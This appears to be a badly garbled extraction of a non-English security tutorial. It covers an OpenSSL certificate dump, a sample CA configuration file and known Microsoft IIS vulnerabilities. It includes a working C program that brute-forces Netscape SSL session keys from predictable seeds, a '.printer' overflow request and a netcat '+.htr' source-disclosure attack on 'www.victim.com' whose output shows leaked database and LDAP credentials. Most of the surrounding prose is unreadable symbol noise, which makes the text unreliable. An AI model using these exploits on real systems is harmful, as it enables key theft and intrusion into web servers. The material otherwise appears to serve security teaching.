Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root
CA/[email protected]
Not Before: Nov 20 05:47:44 2001 GMT
Not After : Nov 20 05:47:44 2002 GMT
Subject:
C=FJ,
ST=Fiji,
L=Suva,
O=SOPAC,
CN=www.sopac.org/[email protected]
Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:54:2c:ab:88:74:aa:6b:35:a5:a9:c1:d0:5a:
9b:fb:6b:b5:71:bc:ef:d3:ab:15:cc:5b:75:73:36:
b8:01:d1:59:3f:c1:88:c0:33:91:04:f1:bf:1a:b4:
7a:c8:39:c2:89:1f:87:0f:91:19:81:09:46:0c:86:
08:d8:75:c4:6f:5a:98:4a:f9:f8:f7:38:24:fc:bd:
94:24:37:ab:f1:1c:d8:91:ee:fb:1b:9f:88:ba:25:
da:f6:21:7f:04:32:35:17:3d:36:1c:fb:b7:32:9e:
42:af:77:b6:25:1c:59:69:af:be:00:a1:f8:b0:1a:
6c:14:e2:ae:62:e7:6b:30:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
OU=ICT,
Public
Key
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F
X509v3 Authority Key Identifier:
keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5
:A6
DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root
CA/Email=administrator@serial:00
Signature Algorithm: md5WithRSAEncryption
34:8d:fb:65:0b:85:5b:e2:44:09:f0:55:31:3b:29:2b:f4:fd:
aa:5f:db:b8:11:1a:c6:ab:33:67:59:c1:04:de:34:df:08:57:
2e:c6:60:dc:f7:d4:e2:f1:73:97:57:23:50:02:63:fc:78:96:
34:b3:ca:c4:1b:c5:4c:c8:16:69:bb:9c:4a:7e:00:19:48:62:
e2:51:ab:3a:fa:fd:88:cd:e0:9d:ef:67:50:da:fe:4b:13:c5:
0c:8c:fc:ad:6e:b5:ee:40:e3:fd:34:10:9f:ad:34:bd:db:06:
ed:09:3d:f2:a6:81:22:63:16:dc:ae:33:0c:70:fd:0a:6c:af:
bc:5a
−−−−−BEGIN CERTIFICATE−−−−−
MIIDoTCCAwqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBiTELM
AkGA1UEBhMCRkox
DTALBgNVBAgTBEZpamkxDTALBgNVBAcTBFN1dmExDjAMBgNVB
AoTBVNPUEFDMQww
CgYDVQQLEwNJQ1QxFjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJ
jAkBgkqhkiG9w0B
CQEWF2FkbWluaXN0cmF0b3JAc29wYWMub3JnMB4XDTAxMTEyM
DA1NDc0NFoXDTAy
MTEyMDA1NDc0NFowgYkxCzAJBgNVBAYTAkZKMQ0wCwYDVQQIE
wRGaWppMQ0wCwYD
VQQHEwRTdXZhMQ4wDAYDVQQKEwVTT1BBQzEMMAoGA1UECxMDS
UNUMRYwFAYDVQQD
Ew13d3cuc29wYWMub3JnMSYwJAYJKoZIhvcNAQkBFhdhZG1pb
mlzdHJhdG9yQHNv
cGFjLm9yZzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAu
lQsq4h0qms1panB
0Fqb+2u1cbzv06sVzFt1cza4AdFZP8GIwDORBPG/GrR6yDnCi
R+HD5EZgQlGDIYI
2HXEb1qYSvn49zgk/L2UJDer8RzYke77G5+IuiXa9iF/BDI1F
z02HPu3Mp5Cr3e2
JRxZaa++AKH4sBpsFOKuYudrMOkCAwEAAaOCARUwggERMAkGA
1UdEwQCMAAwLAYJ
YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZ
mljYXRlMB0GA1Ud
DgQWBBT+BEbtoBW+wUtZA/gtDe0q4O35LzCBtgYDVR0jBIGuM
IGrgBTmEnw9oQLl
uh/anje+40U+m67lpqGBj6SBjDCBiTELMAkGA1UEBhMCRkoxD
TALBgNVBAgTBEZp
amkxDTALBgNVBAcTBFN1dmExDjAMBgNVBAoTBVNPUEFDMQwwC
gYDVQQLEwNJQ1Qx
FjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJjAkBgkqhkiG9w0BC
QEWF2FkbWluaXN0
cmF0b3JAc29wYWMub3JnggEAMA0GCSqGSIb3DQEBBAUAA4GBA
DSN+2ULhVviRAnw
VTE7KSv0/apf27gRGsarM2dZwQTeNN8IVy7GYNz31OLxc5dXI
1ACY/x4ljSzysQb
xUzIFmm7nEp+ABlIYuJRqzr6/YjN4J3vZ1Da/ksTxQyM/K1ut
e5A4/00EJ+tNL3b
Bu0JPfKmgSJjFtyuMwxw/Qpsr7xa
−−−−−END CERTIFICATE−−−−−
nB
G
5! , B 0
n:
# " ? 59
,B 6
T
?@
# 0, ›
6
, B
0
B
. "
B
.
#
]
<
- Y
6
6
'X
R &
T
-,
'-,< ,
?@ S/
b
-, <
-,< > ( 4
F
6
6
b'
2 0 <-
,
P! $
N 56
2 S/
7 !89
F " , P & 6, B 2
&
' 56 ) / 6
)/
> ? ") 6
2
N %.
- Y
GF
"
,
#
3
L3
L3 , B N 7 P
!
6-
) 6 6
, P)
$,
<
R & ( 4b
. ,
)_
L3
a OpenSSL ,
#4% '
#−−−Begin−−−
#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#
RANDFILE = $ENV::HOME/.rnd
oid_file = $ENV::HOME/.oid
oid_section = new_oids
# To use this configuration file with the "−extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions =
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)
[ new_oids ]
# We can add new OIDs in here for use by '
ca'and '
req'
.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6
###########################################################
#########
[ ca ]
default_ca = CA_default # The default ca section
###########################################################
#########
[ CA_default ]
dir = /var/ssl # Where everything is kept
certs = $dir/certs # Where the issued certs are kept
crl_dir = $dir/crl # Where the issued crl are kept
database = $dir/index.txt # database index file.
new_certs_dir = $dir/newcerts # default place for new certs.
certificate = $dir/cacert.pem # The CA certificate
serial = $dir/serial # The current serial number
crl = $dir/crl.pem # The current CRL
private_key = $dir/private/cakey.pem # The private key
RANDFILE = $dir/private/.rand # private random number file
x509_extensions = usr_cert # The extentions to add to the cert
# Extensions to add to a CRL. Note: Netscape communicator chokes on
V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions = crl_ext
default_days = 365 # how long to certify for
default_crl_days= 7 # how long before next CRL
default_md = sha1 # which md to use.
preserve = no # keep passed DN ordering
# A few difference way of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :−)
policy = policy_match
# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = optional
localityName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
# For the '
anything'policy
# At this point in time, you must list all acceptable '
object'
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
###########################################################
#########
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes
default_md = sha1
x509_extensions = v3_ca # The extentions to add to the self signed cert
# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret
# This sets a mask for permitted string types. There are several options.
# default: PrintableString, T61String, BMPString.
# pkix : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or
UTF8Strings
# so use this option with caution!
string_mask = nombstr
# req_extensions = v3_req # The extensions to add to a certificate request
[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = FJ
countryName_min = 2
countryName_max = 2
stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Fiji
localityName = Locality Name (eg, city)
localityName_default = Suva
0.organizationName = Organization Name (eg, company)
0.organizationName_default = SOPAC
# we can do this but it is not needed normally :−)
#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = World Wide Web Pty Ltd
organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = ITU
commonName = Common Name (eg, YOUR name)
commonName_max = 64
emailAddress = Email Address
emailAddress_max = 40
# SET−ex3 = SET extension number 3
[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20
unstructuredName = An optional company name
[ usr_cert ]
# These extensions are added when '
ca'signs a request.
# This goes against PKIX guidelines but some CAs do it and some
software
# requires this to avoid interpreting an end user certificate as a CA.
basicConstraints=CA:FALSE
# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.
# This is OK for an SSL server.
# nsCertType = server
# For an object signing certificate this would be used.
# nsCertType = objsign
# For normal client use this is typical
# nsCertType = client, email
# and for everything including object signing:
# nsCertType = client, email, objsign
# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# PKIX recommendations harmless if included in all certificates.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer:always
# This stuff is for subjectAltName and issuerAltname.
# Import the email address.
# subjectAltName=email:copy
# Copy subject details
# issuerAltName=issuer:copy
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ v3_ca ]
# Extensions for a typical CA
# PKIX recommendation.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid:always,issuer:always
# This is what PKIX recommends but some broken software chokes on
critical
# extensions.
# basicConstraints = critical,CA:true
# So we do this instead.
basicConstraints = CA:true
# Key usage: this is typical for a CA certificate. However since it will
# prevent it being used as an test self−signed certificate it is best
# left out by default.
# keyUsage = cRLSign, keyCertSign
# Some might want this also
# nsCertType = sslCA, emailCA
# Include email address in subject alt name: another PKIX
recommendation
# subjectAltName=email:copy
# Copy issuer details
# issuerAltName=issuer:copy
# RAW DER hex encoding of an extension: beware experts only!
# 1.2.3.5=RAW:02:03
# You can even override a supported extension:
# basicConstraints= critical, RAW:30:03:01:01:FF
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ crl_ext ]
# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a
CRL.
# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always
#−−−−End−−−−
a =B*
a
6
_CA]
6
,F 'X
"
)
2 )
SL A)
6
,
Openssl. X 509 - in cacert.pem – out cacert.crt
a "h @
,6
H?
3
O)
-,< E % '2
http://yoursite.com/ssl/cacert.crt
?
< crt \ "
,<
0 <– R
•Y
,
$,
) - 3•
H
.
,
" U4
@
P
<
5<
6 #6•Y "
& 5 <0 <
")
6
3
6
@
B
F
")
0, 5 'X
,
" j
? •Y b
update
'G
3-
B
5F "
)
- 3•S
B Netscapeb
2 0, K5
%.
? 5 5<
@ ) ,6
d *
SL %/
N4
)
<
(E
6& \ , C
5 / SL B
/ ? 4
%P
H" ,
d*
0 … ) 6,› 3
5
$%5
5!
@
6> $
?
'X
0,
6
,
F)
)
SL
),
<
SL A)
O) "
0, 5
YB*
("c – 6—
6
,
3% !
') #
—6
5<
<
6
), Nh5
-N4
#
F ') #
P
# 7, ,
#
5<
)
a Mozilla ) Netscape
:
O)
#
-
,
,
"
,6 * ?
O)
$ ) 42
5< )
-,< - @ 5< 6
F?
0
6
b
2 `56, 5
6
3 j< 4
) ),
O) ) , CA 6
CA ,
<
)
$
"
" , <
MIME \ "
B'
7 #
6
- Y
O) $ % !
a Galeon
)
,< ,6 3
6
2 "
, –6
SL A)
HTML 5F
0
" )
F) Galeon
,
6
6
" $,
% 5! Mozilla
,
3 & 2
CH Galeon
),
a lnternet Explorer
I'/ )
" 0
9
6 D ?@ S L
@
2
2 T
% ') -
3
6
&
d*
,
B-
: IE _-, < Z>
6,G
6
3]
I.12 " ,
F SSL %•) 4 " ,
— )
h @
)
- Y
SL A)
?
)
b
) % ' ) 0, K5 - 3• 3
,
3 6
SL
5!
,6 3 5 !
6
2 # KE @
6 6
,< -,< Z> CA
0, K5 - Y
6-
aC?"
#include <std/disclaimer.h>
#include <stdio.h>
#include <stdlib.h>
typedef unsigned int UINT4;
#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
SSL % '–"
- 4" –
5
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
/* ROTATE_LEFT rotates x left n bits.
*/
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
Rotation is separate from addition to prevent recomputation.
*/
#define FF(a, b, c, d, x, s, ac) { \
(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define GG(a, b, c, d, x, s, ac) { \
(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) { \
(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) { \
(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d =
0x10325476, x[16];
unsigned int i,j;
for (i = 0, j = 0; j < 64; i++, j += 4)
x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
(((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);
/* Round 1 */
FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */
/* Round 2 */
GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */
/* Round 3 */
HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */
/* Round 4 */
II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */
a += 0x67452301;
b += 0xefcdab89;
c += 0x98badcfe;
d += 0x10325476;
/* We need to swap endianness here */
state[0] = ((unsigned char *)&a)[3];
state[1] = ((unsigned char *)&a)[2];
state[2] = ((unsigned char *)&a)[1];
state[3] = ((unsigned char *)&a)[0];
state[4] = ((unsigned char *)&b)[3];
state[5] = ((unsigned char *)&b)[2];
state[6] = ((unsigned char *)&b)[1];
state[7] = ((unsigned char *)&b)[0];
state[8] = ((unsigned char *)&c)[3];
state[9] = ((unsigned char *)&c)[2];
state[10] = ((unsigned char *)&c)[1];
state[11] = ((unsigned char *)&c)[0];
state[12] = ((unsigned char *)&d)[3];
state[13] = ((unsigned char *)&d)[2];
state[14] = ((unsigned char *)&d)[1];
state[15] = ((unsigned char *)&d)[0];
}
#define mklcpr(val)
((0xdeece66d*(val)+0x2bbb62dc)>>1)
int main(int argc, char **argv)
{
int
i;
unsigned char maybe_challenge[16], true_challenge[16];
unsigned char key[16];
char
*p;
unsigned long sec, usec, pid, ppid;
unsigned char eblock[64], cblock[64];
unsigned char *o1;
int
o2;
if (argc == 5 && strlen(argv[4]) >= 47) {
sec = strtol(argv[1], (char **) 0, 0);
pid = strtol(argv[2], (char **) 0, 0);
ppid = strtol(argv[3], (char **) 0, 0);
p = argv[4];
for (i=0; i<16; i++) {
true_challenge[i] = strtol(p, &p, 16);
p++;
}
}
else
{
printf("Usage: %s sec pid ppid "
"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n",
argv[0]);
exit(1);
}
/* Set up eblock and cblock */
for(i=0;i<64;++i) eblock[i]=0;
eblock[8] = 0x80;
eblock[56] = 0x40;
for(i=0;i<64;++i) cblock[i]=0;
cblock[16] = 0x80;
cblock[56] = 0x80;
((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));
for (usec=0; usec < (1<<20); usec++) {
((int *)eblock)[0] = mklcpr(usec);
MD5Transform1(cblock, eblock);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(maybe_challenge, cblock);
if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
printf("Found it! The key is ");
o2 = 0;
o1 = &(cblock[0x0f]);
do {
if ((*o1)++) break;
--o1;
} while (++o2 <= 0x0f);
MD5Transform1(key, cblock);
for (i=0; i<0x10; i++)
printf("%2.2X ", (unsigned char) key[i]);
printf("\n");
printf("usec = %lu\n", usec);
exit(0);
}
}
printf("Not found.\n");
exit(1);
}
Microsoft internet information server
(IIS)
T ,
)
O)
6)
2 0,<
"
6b. 2
O) ? •Y
B
5/
1! M,6
-,< ;!
256)
YGX$?
#
B)
)h 4
2
+' , ,F
n & n 9"
IIS )
(
<
6*
a
I
,
B ,
)
6=GX \
Y,
YGX
6 Y1
IIS
#
G ) 6, i X
0,E N T)
E
785/ 2
)
P1
# (DLL) #
B
6
6 *
) 4
,
"
! 5E
H
)
6$;.P 2
@ !
6 Y1
£ B
! B
5/
-
% G N, #
B
! B
5/…
3 B
! B
5/…
?
IIS
-
P1, -,<
IIS
?
IIS
1Q ?
#<@
- NB
4 6F
6ˆ4 b
-,< K , ,F 7c L.
" -)
"
F$showcode.asp
7
2 `56) , -,< K
0, -,< K
H O) ? • Y
785/ )_MDAC/RDS]-
' &
3
3
2 "
5
-
"
#<@$::$DATA P
<6
7 !89 "
?
0
)
# IIS
4"
56% 1 256 0
6=GX
7
- Y
7
IIS
! 5E 2
inetinfo.exe$
,6*
0, -
% ' b
.prniter,
,
4
% '
E
"
DDL
3
B'2
-
TQ
0 <
6 K
7
B ) 256 ) , 6 v 4
$,
3
IIS "
E
B
5! 7
L3 ,
4
-, < / 9 DDL " $_, <
3
F % '2
0,
bP
- N
4 j 40
N ISAPI
7 B
5! ( E
w
3
PHP)COLdfusion I K6-, "
/7
IIS S L ? "
)
- 1
@ B)
" -
6 B'" $IIS0, 5
),
@0 ,
3
f 0,
% ' $
1 2
3
'j 4 7
5G 2
ISAPI "
- Y
P4
F
'
R4 S @ ^
ISAPI
6
H B
5/
$n 9 2 "
,<
O *
"
6 ' ? 5F
6
@^
F
-, 6 U )
)
)
6%
L * iX
0,
4 ) 7 # 0_URL
6=GX) 78#
)
-, < - )@
o
"
], 5
,
5 7
6
5$
),
6'
-, 6 U )
) i.
)
H ? 5F $ F
6 ) nH
, ,F R4 S @ ^
F)
N
ntdll.dll webDAV
SL IIS )
T#< ) =GX
3
"
F
6h @
I ],
N 0, 5 6 '
-, < SL T L.
"
N
6 ) )
"
?5F
3 - *1 7
_PHP)coldfusion
$ R4 S @ ^
H
$O)
( N (, !0, - 5 - Y
F
F) E
) )
6URLb
6
, N)
#
6,
6DLL
? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0
3 I
g
"
l '=GX "
8Q 0 )@
C
_SL ]
7 L
? 56 B )
- Y $O)
2 56,
-,< I
N "$ 1
) S L " U 4 IISS
R 4S
6
L C85! ) - PS L
B'\ 2 " " E
+ E'IIS 6 )
)‚
code red2 ) code red0,
_U )
k
" ,G , 5
-,< ;!
- Y Z
% .6
3 M ,6
)e
? •Y
B3
3
4
RN $p ISAPI
-,<
,F ) W 3 7 B
5! (&B $ ISAPI 6 B'"
)
O)
V < )_server side includes]SSI$_active server pages]ASP
k
?
P1]
3 ], <
7 ) X
")
F
",
)
&
, # 4 (,! % 1
, ,
& IIS
1Q0_ N T L.
,<
T L.
1
-handel
internet server application programming interface 2
<R
1
,
n 9 " 785/
1
) )
N
,
GH )
1QZ&F
P
10
I, 6, -" F
-,< ?
0, -
@-
- Y Z
< ISAPI
0 <
ISAPI DLL
0, <
'
&
IIS O)
b
- 4 '
( E ISAPI )
785/$ <
6)
&
"
4
pqqp T
785/ 2
6=GX "
" j* 2
N
# pqqp T
2
'
0
&
% )@
=
P 4
HTTP , @
-
1
@
b
ISAPI DLL )
^
?
eEye
n 9" k
‹pq C
P
0
@
1Q
F
' &
3
"
#
Digital security$pqqw
ISAPI
B'
% # ) 4_c:\winnt\system32\msw3prt.dll] B'
k
#P
< 6 N4
"T Q
-,< "
0 printer
P 4 _IPP]s
#
3)
h
0, -
(8! $,
0,
) ) pqqw T
Ÿ
0
6 B'?)
"
60, , < ? ) nimda)codered
)
ASP 7 .Y
0, <
+P
85/ 2
%
6ISAPI DLL
O) ) -,<
@"
<-
=B*
'
,@
'printer
F
ISAPI
0 ',6 3 lY 2
IPP0,
6 PF
H)
Ÿ
HOST
3
6
2
420[buffer] 5 H
H
GET/NUL.printer HTTP/1.0
HOST:[buffer]
"), )
<
<
<&
;! )_information],
=GX 2
;! ,
IIS)
0 <
P
10,
'
F- )
" , - e 'j 4 )
<
;! -
IIS
1
)
7
1/
1P 7 L
;! $ <
" , - - ) IIS # N60_ < B
H
B
G
1/
)
,
2
pqqq
O)
,4
‚,6
H) # &F ]
3
)
IIS
. [ ˆ6
)
) ,6 Ÿ IIS
3
'L
2' R
6:3
internet printing protocol
ISAPI DLL
5 printer '
&
b
)@ 6 3 +
F) ISAPI DLL
j 5
!89 ?
,
,<
F) ?
# " %P
H
" ,<
l '
bB
g +P
% '2 <
" - Y
,
5<
+.htr
3
F) ISAPI DLL
@j 5
,<
,
-
j 5 -
3
)
,
F"
G
F 0,
,6
=GX
$ < F IIS b
<N ISM.DLL
htr.txt (
F
% '+
ISM.DLL
-,
,<
'0
! 1/
7
<
"
3 TQ +.htr
'"
?@ ?
56
-, @
+
" E$
"
U)
,<
Ÿ
1Q 5 H 2
Q
/P " • & -
;! ) ,
5<
'
3
=GX -
?@
G0 , 6
1Q 2 0 <
Y bB
g
'
<
7 G:H$5 ) 4IIS
3
"
"
ISAPI DLL
<) ) N F
<
6-
_Source Disclosure]+
% '
ISAPI DLL
% '.htr,
40 ,
,
Y
E
-
2 " NetCat
Ÿ
0
N
GET/sitel/global.asa+.htr HTTP/1.0
[CLRF]
[CLRF]
5<
-,<
H
R4 S @ )
netcat B )
9P " - Y
a,
-,6
f ,
c:\>nc -vv www.victim.com 80<htr.txt
www.victim [10.0.0.10]80(http)open
200 OK
HTTP/1.0
server:microsoft-IIS/5.0
date:thu,25 jan 2001 00:50:17 GMT
<!--filename=global.asa-->("profiles_connectstring")
"DNS=profile;UID=company_user;password=secret"
("DB_connectstring")
="DSN=db;UID=company_user;password=secret"
="DSN=phf;UID=sa;pwd="
("PHFconectstring")
("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas
sword=simple"
("connectionstring")="DSN=company;UID=company_user;password=gu
essme"
("email_pwd")="sendaemon"
="LDAP://DIRECTORY.COMPANY.COM:389"
("ldapserver")
("LDAPUSERLD")="CN=DIRECTORY ADMIN"
("LDAPPWD")="SLAPDME"
?
$GLOPA.ASA% ' ,
T 5G 7
5<0
-,< S#
)
-,
&
,1
7 5B "
6P<
, ,< F
ISAPI DLL
R4 S @ "
N 4)
0
<
T/0,
3
@ 56-
- Y
&
,
3
6ISAPI DLL
,<
) ) 7 !89
7
;!
F) B
,
2 560
<
;!
@ MR /
0,
MR /
),
B
!$
-
'X
?
GF'
B
6
E
)
? DLL
6-,
<N MR/
7
+.HTR +
